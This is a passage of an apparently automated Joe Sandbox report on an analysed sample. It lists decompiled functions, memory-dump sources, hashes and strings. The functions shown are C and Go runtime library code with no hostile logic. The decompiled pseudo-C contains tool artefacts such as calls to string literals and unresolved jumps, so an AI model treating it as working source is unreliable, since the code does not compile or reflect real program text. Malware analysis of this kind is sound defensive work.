                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7AA10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A7AA10(intOrPtr* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _t5;

				_a24 = __rbx;
				_a32 = __r9;
				_a16 = __rcx;
				if (__r8 == 0) goto 0xf8a7aa5c;
				if (__r9 == 0) goto 0xf8a7aa5c;
				if (__rcx != 0) goto 0xf8a7aa73;
				_t5 = E0000025B25BF8A7B89C(__rax);
				 *__rax = 0x16;
				E0000025B25BF8A7BEC4(_t5);
				return 0;
			}




                                                                                                                            0x25bf8a7aa10
                                                                                                                            0x25bf8a7aa15
                                                                                                                            0x25bf8a7aa35
                                                                                                                            0x25bf8a7aa40
                                                                                                                            0x25bf8a7aa45
                                                                                                                            0x25bf8a7aa4a
                                                                                                                            0x25bf8a7aa4c
                                                                                                                            0x25bf8a7aa51
                                                                                                                            0x25bf8a7aa57
                                                                                                                            0x25bf8a7aa72

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2328795619-0
                                                                                                                            • Opcode ID: fe6c69e06a5171c637e28ec553544637b132a332b2738a7bcf0611f9cb5f9797
                                                                                                                            • Instruction ID: 838435a5375285df8fb05ac5d9547276a0291542d96aed56dbe7a580ec424867
                                                                                                                            • Opcode Fuzzy Hash: fe6c69e06a5171c637e28ec553544637b132a332b2738a7bcf0611f9cb5f9797
                                                                                                                            • Instruction Fuzzy Hash: 0D512863704E4066FE268A665D0A76D6691E380BF1F344710BB3943FC4EB34E891E728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACB12C Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1547050394-0
                                                                                                                            • Opcode ID: 271e1aa9dde04d657ce96203ddd2593fe8d93db4ce24f7b2a5438f8da3e95bbd
                                                                                                                            • Instruction ID: ff3c0a168232e4902c71c00facd6982d8c72ca5921cfdb40af41b53246a98ed6
                                                                                                                            • Opcode Fuzzy Hash: 271e1aa9dde04d657ce96203ddd2593fe8d93db4ce24f7b2a5438f8da3e95bbd
                                                                                                                            • Instruction Fuzzy Hash: 36210832608E594FFF92EB284C0D36A72D1EB9A321F240559B445D36A2DB38CC428369
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7A52C Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E0000025B25BF8A7A52C(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, void* __r9, void* _a8, void* _a16, void* _a32) {
				void* _t8;
				intOrPtr* _t15;
				intOrPtr* _t27;

				r8d = 0x40;
				goto 0xf8a7a454;
				asm("int3");
				_t15 = _t27;
				 *((long long*)(_t15 + 8)) = __rbx;
				 *((long long*)(_t15 + 0x10)) = __rbp;
				 *((long long*)(_t15 + 0x20)) = __rsi;
				 *((long long*)(_t15 + 0x18)) = __r8;
				if (__rdx == 0) goto 0xf8a7a580;
				if (__r8 == 0) goto 0xf8a7a580;
				if (__r9 != 0) goto 0xf8a7a59f;
				_t8 = E0000025B25BF8A7B89C(_t15);
				 *_t15 = 0x16;
				E0000025B25BF8A7BEC4(_t8);
				return 0;
			}






                                                                                                                            0x25bf8a7a52c
                                                                                                                            0x25bf8a7a532
                                                                                                                            0x25bf8a7a537
                                                                                                                            0x25bf8a7a538
                                                                                                                            0x25bf8a7a53b
                                                                                                                            0x25bf8a7a53f
                                                                                                                            0x25bf8a7a543
                                                                                                                            0x25bf8a7a547
                                                                                                                            0x25bf8a7a564
                                                                                                                            0x25bf8a7a569
                                                                                                                            0x25bf8a7a56e
                                                                                                                            0x25bf8a7a570
                                                                                                                            0x25bf8a7a575
                                                                                                                            0x25bf8a7a57b
                                                                                                                            0x25bf8a7a59e

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1547050394-0
                                                                                                                            • Opcode ID: c2a2d518c0411f4a1b6f29b9841f12473f55a72886990cbb50f9ee093eae4808
                                                                                                                            • Instruction ID: 0a448a856be8fa8772657f85989b41e974b922cbe25fce5920d2ea7df9591bd7
                                                                                                                            • Opcode Fuzzy Hash: c2a2d518c0411f4a1b6f29b9841f12473f55a72886990cbb50f9ee093eae4808
                                                                                                                            • Instruction Fuzzy Hash: 6321D863604E8155FF639B21AC0E31D6291F7447E1F244420BE4987F86EB3DD442AB38
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A84434 Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0000025B25BF8A84434(signed int __ebx, signed int __ecx, void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, signed int _a8, long long _a24) {
				void* __rdi;
				void* __rsi;
				void* _t16;
				void* _t20;
				void* _t34;
				void* _t38;
				intOrPtr* _t45;
				signed long long _t48;
				signed long long _t53;

				_t34 = __edx;
				_a24 = __rbx;
				_a8 = __ecx;
				if (__edi != 0xfffffffe) goto 0xf8a8445d;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a844fa;
				if (__ecx < 0) goto 0xf8a844ea;
				_t38 = __edi -  *0xf8aa7384;
				if (_t38 >= 0) goto 0xf8a844ea;
				_t53 = __ecx >> 5;
				_t48 = __ecx * 0x58;
				if (_t38 == 0) goto 0xf8a844ea;
				E0000025B25BF8A83FA8(__ebx & 0x0000001f, __edi, _t48, __ecx, _t53);
				_t45 =  *((intOrPtr*)(0xf8aa3200 + _t53 * 8));
				if (( *(_t45 + _t48 + 8) & 0x00000001) == 0) goto 0xf8a844d1;
				_t16 = E0000025B25BF8A842E4(__edi, _t34, _t45);
				"kernel32"();
				if (_t16 != 0) goto 0xf8a844c4;
				"\\%s: %d"();
				goto 0xf8a844c6;
				if (0 == 0) goto 0xf8a844df;
				E0000025B25BF8A7B82C(_t45);
				 *_t45 = 0;
				E0000025B25BF8A7B89C(_t45);
				 *_t45 = 9;
				0xf8a84408();
				goto 0xf8a844fd;
				_t20 = E0000025B25BF8A7B89C(_t45);
				 *_t45 = 9;
				return E0000025B25BF8A7BEC4(_t20) | 0xffffffff;
			}












                                                                                                                            0x25bf8a84434
                                                                                                                            0x25bf8a84434
                                                                                                                            0x25bf8a84439
                                                                                                                            0x25bf8a8444b
                                                                                                                            0x25bf8a8444d
                                                                                                                            0x25bf8a84452
                                                                                                                            0x25bf8a84458
                                                                                                                            0x25bf8a8445f
                                                                                                                            0x25bf8a84465
                                                                                                                            0x25bf8a8446b
                                                                                                                            0x25bf8a84473
                                                                                                                            0x25bf8a84481
                                                                                                                            0x25bf8a84491
                                                                                                                            0x25bf8a84495
                                                                                                                            0x25bf8a8449b
                                                                                                                            0x25bf8a844a4
                                                                                                                            0x25bf8a844a8
                                                                                                                            0x25bf8a844b0
                                                                                                                            0x25bf8a844b8
                                                                                                                            0x25bf8a844ba
                                                                                                                            0x25bf8a844c2
                                                                                                                            0x25bf8a844c8
                                                                                                                            0x25bf8a844ca
                                                                                                                            0x25bf8a844cf
                                                                                                                            0x25bf8a844d1
                                                                                                                            0x25bf8a844d6
                                                                                                                            0x25bf8a844e1
                                                                                                                            0x25bf8a844e8
                                                                                                                            0x25bf8a844ea
                                                                                                                            0x25bf8a844ef
                                                                                                                            0x25bf8a8450a

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102446242-0
                                                                                                                            • Opcode ID: 20743d8f56c4e238449b4cf57046a006d5efaa6fd458a657e1fd87a2fed527f8
                                                                                                                            • Instruction ID: 28e5dcb0c4df58a8bc56373edd1716aeaa7961e65a9c5207982a48574a0d189c
                                                                                                                            • Opcode Fuzzy Hash: 20743d8f56c4e238449b4cf57046a006d5efaa6fd458a657e1fd87a2fed527f8
                                                                                                                            • Instruction Fuzzy Hash: 6E218E23601E4086FF176F65BC9C36D6A50EB80773F294128FA1606BD2DBB88842873C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A78FD4 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 62%
                                                                                                                            			E0000025B25BF8A78FD4(intOrPtr __esi, signed long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
				void* _t18;
				void* _t19;
				void* _t24;
				void* _t27;
				signed long long _t29;
				signed long long _t38;
				void* _t54;
				signed long long _t55;

				_t29 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				malloc(??);
				 *__rax = __rcx;
				_t55 = __rax;
				malloc(??);
				 *((long long*)(__rax + 0x10)) = __rax;
				E0000025B25BF8A797B0(0x28, _t24, __esi, _t27, __rax, __rdx, r8d);
				 *((intOrPtr*)(_t55 + 8)) = __esi;
				malloc(??);
				r9d = __esi;
				_t38 = _t29;
				 *(_t55 + 0x18) = _t29;
				E0000025B25BF8A794CC(_t19, 0x100, _t29, _t38, __rdx,  &M0000025B25BF8A8CD10, _t54);
				if ( *((char*)(_t29 + (_t38 | 0xffffffff) + 1)) != 0) goto 0xf8a7904b;
				 *((intOrPtr*)(_t55 + 0xc)) = 0x100;
				_t18 = malloc(??);
				 *(_t55 + 0x20) = _t29;
				return _t18;
			}











                                                                                                                            0x25bf8a78fd4
                                                                                                                            0x25bf8a78fd4
                                                                                                                            0x25bf8a78fd9
                                                                                                                            0x25bf8a78fde
                                                                                                                            0x25bf8a78ff7
                                                                                                                            0x25bf8a78fff
                                                                                                                            0x25bf8a79002
                                                                                                                            0x25bf8a79005
                                                                                                                            0x25bf8a79013
                                                                                                                            0x25bf8a79017
                                                                                                                            0x25bf8a79023
                                                                                                                            0x25bf8a79027
                                                                                                                            0x25bf8a79033
                                                                                                                            0x25bf8a79036
                                                                                                                            0x25bf8a7903e
                                                                                                                            0x25bf8a79042
                                                                                                                            0x25bf8a79052
                                                                                                                            0x25bf8a79054
                                                                                                                            0x25bf8a7905d
                                                                                                                            0x25bf8a79071
                                                                                                                            0x25bf8a7907e

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                                                                            • String ID: lock error
                                                                                                                            • API String ID: 2026495703-4111267675
                                                                                                                            • Opcode ID: 2092c14244dccb223253486cb61779be6fcf792fe870ad61ab41c838604735e8
                                                                                                                            • Instruction ID: e42b99832039a4e28ac0a5c42786820f51031a3fa13bab2373cb62cb694da62e
                                                                                                                            • Opcode Fuzzy Hash: 2092c14244dccb223253486cb61779be6fcf792fe870ad61ab41c838604735e8
                                                                                                                            • Instruction Fuzzy Hash: E201E132600B5141EA45DB12BC0D79D6699F389BE1F28821AFEA943FC6CF3CC0128780
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131AA40 Relevance: 8.9, Strings: 7, Instructions: 189COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0131AA40(signed int __eax, signed int __ecx, void* __esp, signed int __rax, unsigned long long __rcx, signed long long __rdi, long long __rsi, long long __rbp, unsigned int __r8, void* __r14, signed int _a8, long long _a16, long long _a24, signed long long _a32, long long _a40, unsigned long long _a48) {
				char _v8;
				long long _v16;
				long long _v24;
				signed int _t73;
				void* _t88;
				signed int _t97;
				signed int _t98;
				void* _t105;
				signed int _t106;
				long long _t139;
				unsigned long long _t146;
				unsigned long long _t147;
				intOrPtr _t148;
				void* _t164;
				signed long long _t176;
				long long _t180;
				void* _t181;

				L0:
				while(1) {
					L0:
					_t181 = __r14;
					_t170 = __r8;
					_t159 = __rbp;
					_t157 = __rsi;
					_t154 = __rdi;
					_t142 = __rcx;
					_t121 = __rax;
					_t107 = __esp;
					_t97 = __ecx;
					_t73 = __eax;
					if(_t164 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L29;
					}
					L1:
					_v8 = __rbp;
					_t159 =  &_v8;
					if((__rax & 0x00000007) != 0) {
						L28:
						_t121 = 0x138ce51;
						E01330BA0(0x138ce51, _t139, _t159);
						goto L29;
					}
					L2:
					_a8 = __rax;
					_t148 =  *((intOrPtr*)(__rdi + 0x50));
					_t170 = __r8 >> 3;
					r9d = r9d & 0x00000007;
					_t180 = __rcx;
					_t144 = __r8;
					r12d = 1;
					r12d = r12d << __ecx;
					_t176 = _t148 + _t170;
					if( *0x14cf2f3 != 0) {
						L13:
						_a40 = __rsi;
						_t144 = __rcx;
						_t154 = _t176;
						_t106 = r12d;
						_t170 = __r8;
						_t73 = L01312E60(__esp, __rax, __rcx, _t176,  &_v8, __r8, __r14);
						__eflags = _t73;
						if(_t73 != 0) {
							L24:
							return _t73;
						} else {
							L14:
							_t121 = _a8;
							_t157 = _a40;
							goto L15;
						}
					} else {
						L3:
						if( *0x14cf78c <= 0 ||  *((intOrPtr*)(__rdi + 0x30)) > __r8) {
							L6:
							_t101 =  *(_t170 + _t148) & 0x000000ff;
							if((r12b &  *(_t170 + _t148) & 0x000000ff) != 0) {
								L12:
								return _t73;
							} else {
								L7:
								asm("lock inc ebp");
								_t144 =  *((intOrPtr*)(_t154 + 0x18));
								_t170 = 0;
								_t147 = 0 + _t144 >> 0x2a;
								asm("o16 nop [eax+eax]");
								if(0 >= 0x40) {
									L26:
									_t97 = 0x40;
									E013588E0();
									goto L27;
								} else {
									L8:
									r8d = r8d & 0x000fffff;
									_t146 = _t144 >> 0x10;
									r9d =  *(0 + _t146 + 0x21040) & 0x000000ff;
									_t170 =  *0x800005D6DD68 + _t146 + 0x21040;
									_t144 = _t144 >> 0xd;
									if((0x00000001 << (_t97 & 0x0000003f) & r9b) == 0) {
										asm("lock inc ecx");
									}
									_t101 =  *(_t154 + 0x62) & 0x000000ff;
									if(( *(_t154 + 0x62) & 1) == 0) {
										L15:
										asm("prefetcht0 [eax]");
										_t147 =  *_t157;
										__eflags = _t147;
										if(_t147 == 0) {
											L20:
											_t98 = 0;
											__eflags = 0;
											goto L21;
										} else {
											L16:
											_t154 =  *((intOrPtr*)(_t147 + 0x10));
											__eflags = _t154 - 0xfd;
											if(__eflags != 0) {
												L18:
												if(__eflags >= 0) {
													L25:
													E013588C0();
													goto L26;
												} else {
													L19:
													 *(_t147 + 0x18 + _t154 * 8) = _t121;
													 *((long long*)(_t147 + 0x10)) =  *((long long*)(_t147 + 0x10)) + 1;
													_t98 = 1;
													goto L21;
												}
											} else {
												L17:
												_t98 = 0;
												L21:
												__eflags = _t98;
												if(_t98 == 0) {
													_t73 = L013204C0(_t88, _t101, _t157, _t121, _t154, _t159, _t181);
												}
												return _t73;
											}
										}
									} else {
										L11:
										 *((long long*)(_t157 + 0x10)) =  *((intOrPtr*)(_t157 + 0x10)) +  *((intOrPtr*)(_t154 + 0x68));
										return _t73;
									}
								}
							}
						} else {
							L5:
							r10d =  *( *((intOrPtr*)(__rdi + 0x48)) + _t170) & 0x000000ff;
							if((r10b & r12b) == 0) {
								L27:
								_v16 = _t180;
								_v24 = _t139;
								E01332340(_t147, _t159, _t181);
								E01332C40(_t97, _t105, _t106, _t107, 0x138be39, _t139, _t159, _t181);
								L01332AA0(_t101, _t105, _t107, _a8, _t144, _t159, _t181);
								E01332C40(_t97, _t105, _t106, _t107, 0x1387a58, _t139, _t159, _t181);
								L01332AA0(_t101, _t105, _t107, _v24, _t144, _t159, _t181);
								E01332C40(_t97, _t105, _t106, _t107,  &M0138678B, _t139, _t159, _t181);
								L01332AA0(_t101, _t105, _t107, _v16, _t144, _t159, _t181);
								E01332C40(_t97, _t105, _t106, _t107, 0x13867b1, _t139, _t159, _t181);
								L013323C0(_t147, _t159, _t181);
								L0131AD60(_t106, 0x13869cf, _t139, _v24, _v16, _t159, _t181);
								_t142 = _a8;
								_t154 = 0xffffffff;
								L0131AD60(_t106, 0x1386914, _t139, _t142, 0xffffffff, _t159, _t181);
								 *((char*)( *((intOrPtr*)(_t181 + 0x30)) + 0xf9)) = 2;
								E01330BA0(0x1389468, _t139, _t159);
								goto L28;
							} else {
								goto L6;
							}
						}
					}
					L30:
					L29:
					_a8 = _t121;
					_a16 = _t139;
					_a24 = _t142;
					_a32 = _t154;
					_a40 = _t157;
					_a48 = _t170;
					E01356200(_t147, _t159);
				}
			}




















                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa40
                                                                                                                            0x0131aa44
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131aa4a
                                                                                                                            0x0131aa4e
                                                                                                                            0x0131aa53
                                                                                                                            0x0131aa66
                                                                                                                            0x0131ad05
                                                                                                                            0x0131ad05
                                                                                                                            0x0131ad11
                                                                                                                            0x00000000
                                                                                                                            0x0131ad11
                                                                                                                            0x0131aa6c
                                                                                                                            0x0131aa6c
                                                                                                                            0x0131aa72
                                                                                                                            0x0131aa79
                                                                                                                            0x0131aa80
                                                                                                                            0x0131aa84
                                                                                                                            0x0131aa87
                                                                                                                            0x0131aa8a
                                                                                                                            0x0131aa90
                                                                                                                            0x0131aa94
                                                                                                                            0x0131aaa0
                                                                                                                            0x0131ab8b
                                                                                                                            0x0131ab8b
                                                                                                                            0x0131ab90
                                                                                                                            0x0131ab93
                                                                                                                            0x0131ab96
                                                                                                                            0x0131ab99
                                                                                                                            0x0131aba0
                                                                                                                            0x0131aba5
                                                                                                                            0x0131aba7
                                                                                                                            0x0131abfd
                                                                                                                            0x0131ac06
                                                                                                                            0x0131aba9
                                                                                                                            0x0131aba9
                                                                                                                            0x0131aba9
                                                                                                                            0x0131abae
                                                                                                                            0x00000000
                                                                                                                            0x0131abae
                                                                                                                            0x0131aaa6
                                                                                                                            0x0131aaa6
                                                                                                                            0x0131aaad
                                                                                                                            0x0131aac9
                                                                                                                            0x0131aac9
                                                                                                                            0x0131aad1
                                                                                                                            0x0131ab81
                                                                                                                            0x0131ab8a
                                                                                                                            0x0131aad8
                                                                                                                            0x0131aad8
                                                                                                                            0x0131aad8
                                                                                                                            0x0131aade
                                                                                                                            0x0131aaf0
                                                                                                                            0x0131aaf3
                                                                                                                            0x0131aaf7
                                                                                                                            0x0131ab04
                                                                                                                            0x0131ac14
                                                                                                                            0x0131ac17
                                                                                                                            0x0131ac20
                                                                                                                            0x00000000
                                                                                                                            0x0131ab0a
                                                                                                                            0x0131ab0a
                                                                                                                            0x0131ab19
                                                                                                                            0x0131ab2c
                                                                                                                            0x0131ab33
                                                                                                                            0x0131ab40
                                                                                                                            0x0131ab4e
                                                                                                                            0x0131ab5b
                                                                                                                            0x0131ab5d
                                                                                                                            0x0131ab5d
                                                                                                                            0x0131ab61
                                                                                                                            0x0131ab68
                                                                                                                            0x0131abb3
                                                                                                                            0x0131abb3
                                                                                                                            0x0131abb6
                                                                                                                            0x0131abb9
                                                                                                                            0x0131abbc
                                                                                                                            0x0131abe2
                                                                                                                            0x0131abe2
                                                                                                                            0x0131abe2
                                                                                                                            0x00000000
                                                                                                                            0x0131abbe
                                                                                                                            0x0131abbe
                                                                                                                            0x0131abbe
                                                                                                                            0x0131abc2
                                                                                                                            0x0131abc9
                                                                                                                            0x0131abcf
                                                                                                                            0x0131abcf
                                                                                                                            0x0131ac07
                                                                                                                            0x0131ac0f
                                                                                                                            0x00000000
                                                                                                                            0x0131abd1
                                                                                                                            0x0131abd1
                                                                                                                            0x0131abd1
                                                                                                                            0x0131abd6
                                                                                                                            0x0131abda
                                                                                                                            0x00000000
                                                                                                                            0x0131abda
                                                                                                                            0x0131abcb
                                                                                                                            0x0131abcb
                                                                                                                            0x0131abcb
                                                                                                                            0x0131abe4
                                                                                                                            0x0131abe4
                                                                                                                            0x0131abe6
                                                                                                                            0x0131abee
                                                                                                                            0x0131abee
                                                                                                                            0x0131abfc
                                                                                                                            0x0131abfc
                                                                                                                            0x0131abc9
                                                                                                                            0x0131ab6a
                                                                                                                            0x0131ab6a
                                                                                                                            0x0131ab72
                                                                                                                            0x0131ab80
                                                                                                                            0x0131ab80
                                                                                                                            0x0131ab68
                                                                                                                            0x0131ab04
                                                                                                                            0x0131aab5
                                                                                                                            0x0131aab5
                                                                                                                            0x0131aab9
                                                                                                                            0x0131aac3
                                                                                                                            0x0131ac25
                                                                                                                            0x0131ac25
                                                                                                                            0x0131ac2a
                                                                                                                            0x0131ac2f
                                                                                                                            0x0131ac40
                                                                                                                            0x0131ac4a
                                                                                                                            0x0131ac60
                                                                                                                            0x0131ac6a
                                                                                                                            0x0131ac80
                                                                                                                            0x0131ac8a
                                                                                                                            0x0131aca0
                                                                                                                            0x0131aca5
                                                                                                                            0x0131acc0
                                                                                                                            0x0131acd1
                                                                                                                            0x0131acd6
                                                                                                                            0x0131ace0
                                                                                                                            0x0131ace9
                                                                                                                            0x0131ad00
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131aac3
                                                                                                                            0x0131aaad
                                                                                                                            0x00000000
                                                                                                                            0x0131ad17
                                                                                                                            0x0131ad17
                                                                                                                            0x0131ad1c
                                                                                                                            0x0131ad21
                                                                                                                            0x0131ad26
                                                                                                                            0x0131ad2b
                                                                                                                            0x0131ad30
                                                                                                                            0x0131ad35
                                                                                                                            0x0131ad53

                                                                                                                            Strings
                                                                                                                            • +,-./0:<=?CLMPSZ[\, xrefs: 0131AC6F
                                                                                                                            • runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foundtoo many open files in syste, xrefs: 0131AC34
                                                                                                                            • marking free objectmarkroot: bad indexmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 s, xrefs: 0131ACF0
                                                                                                                            • greyobject: obj not pointer-alignedmheap.freeSpanLocked - invalid freemismatched begin/end of activeSweepnetwork dropped connection on resetpersistentalloc: align is too largepidleput: P has non-empty run queueruntime: close polldesc w/o unblockruntime: create, xrefs: 0131AD05
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 0131AC8F
                                                                                                                            • found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->status=, cons/mark -byte limitBidi_ControlGetAddrInfoWGetConsoleCPGetLastErrorGetLengt, xrefs: 0131AC4F
                                                                                                                            • basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimb, xrefs: 0131ACAA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
